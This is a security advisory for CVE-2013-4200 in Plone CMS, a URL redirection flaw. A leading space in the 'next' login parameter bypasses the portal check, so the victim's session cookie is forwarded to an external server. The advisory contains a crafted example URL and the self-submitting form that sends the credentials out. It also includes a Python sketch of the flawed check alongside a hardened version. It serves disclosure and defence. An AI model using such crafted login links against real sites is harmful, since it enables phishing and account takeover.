CVE-2013-4200 - Plone URL redirection / Forwarding of cookie data
#############################################################
#
# COMPASS SECURITY ADVISORY
# http://www.csnc.ch/en/downloads/advisories.html
#
#############################################################
#
# Product: Plone CMS
# Vendor: Plone Foundation (http://plone.org)
# ID(s): CSNC-2013-013, CVE-2013-4200
# Subject: URL Redirection Vulnerability
# Risk: High
# Effect: Remotely exploitable
# Author: Cyrill Bannwart <cyrill.bannwart@csnc.ch>
# Date: 20/05/2013
#
#############################################################
Introduction:
-------------
The discovered vulnerability targets the open source Plone CMS. The
credentials of a valid user can be obtained by using a specially
crafted URL which can be sent to the user by email. When clicking on
the URL, the user is presented with the website's login form and after
a successful login the user as well as his credentials are forwarded to
an external server. This vulnerability can be used by an attacker to
obtain access to a user's account.
Affected:
---------
Vulnerable:
* Plone < 4.3.1
Technical Description:
----------------------
An attacker can craft a URL to the login form of a site where the victim
has valid credentials. The crafted URL contains a redirection target to
which the user, together with his credentials, is forwarded after a
successful login. This URL can be sent to the victim by mail.
By inserting a space before the redirection URL, the isURLInPortal()
method of the URLTool class treats the URL as relative and therefore
does not check it against the allow_external_login_sites property.
Example of crafted URL:
https://example.com/acl_users/credentials_cookie_auth/require_login?next=+https%3A//www.csnc.ch
Once the victim clicks on the URL and logs in, a self-submitting POST
form is loaded that sends the user and his credentials to the external
server.
Example excerpt of HTTP Response:
HTTP/1.1 200 OK
Set-Cookie: __ac="<CREDENTIALS>"; Path=/; HTTPOnly
[CUT]
<form method="post" id="external_login_form" name="external_login_form" action=" https://www.csnc.ch">
<input type="hidden" name="__ac" value="<CREDENTIALS>" />
</form>
<script type="text/javascript">
/*jslint browser: true */
var external_login_form = document.forms.external_login_form;
external_login_form.style.display = 'none';
external_login_form.submit();
</script>
And resulting HTTP POST Request:
POST / HTTP/1.1
Host: www.csnc.ch
Referer: https://www.example.com/login_form
[CUT]
__ac=<CREDENTIALS>
The obtained credentials / cookie content can be used by the attacker to
log in to the website and gain access to the victim's account.
The login form allows further URL parameters such as the password reset
link or the sign up URL that can also be tricked into accepting
non-relative URLs.
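The whitespace bypass described above, shown against a simplified stand-in for the portal check together with a hardened variant (added illustrative Python, not Plone's own isURLInPortal() code; PORTAL_URL and the allow list are constructed values). Browsers strip leading whitespace before resolving a form action, so a check that does not normalise or reject it classifies the target differently from the browser that follows it.

```python
from urllib.parse import urlsplit

# Constructed values for this example, not Plone's configuration.
PORTAL_URL = "https://example.com"
# Stand-in for the allow_external_login_sites property named in the advisory.
ALLOW_EXTERNAL_LOGIN_SITES = ("https://sso.example.org",)


def _allowed_netlocs():
    """Hosts a post-login redirect may legitimately point at."""
    return {urlsplit(PORTAL_URL).netloc} | {
        urlsplit(u).netloc for u in ALLOW_EXTERNAL_LOGIN_SITES
    }


def is_url_in_portal_naive(url):
    """Simplified model of the flawed check: anything that does not start
    with an absolute http(s) scheme is assumed to be a portal-relative path."""
    if not url.startswith(("http://", "https://")):
        return True  # " https://www.csnc.ch" ends up here because of the space
    return urlsplit(url).netloc in _allowed_netlocs()


def is_url_in_portal_hardened(url):
    """Same decision, but whitespace/control characters are rejected outright
    and only http(s) targets on known hosts (or true relative paths) pass."""
    if any(ch.isspace() or ord(ch) < 0x20 for ch in url):
        return False  # leading, trailing or embedded whitespace: never trust
    parts = urlsplit(url)
    if parts.scheme and parts.scheme not in ("http", "https"):
        return False  # javascript:, data: and friends are not portal URLs
    if not parts.scheme and not parts.netloc:
        return True  # genuinely relative path such as /folder/page
    # Absolute or protocol-relative ("//host") URL: the host decides.
    return parts.netloc in _allowed_netlocs()


def safe_next(url, check=is_url_in_portal_hardened):
    """Redirect target to use after login: the requested one if it passes
    the check, otherwise the portal root."""
    return url if check(url) else PORTAL_URL
```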
Workaround / Fix / Patch:
-------------------------
A patch has been released by the vendor.
Timeline:
---------
2013-05-08: Vulnerability discovered
2013-05-20: Vendor notified
2013-05-21: Vendor acknowledged
2013-06-18: Patch released
2013-07-02: Patch updated
2014-01-16: Disclosure
References:
-----------
https://plone.org/products/plone/security/advisories/20130618-announcement
https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4200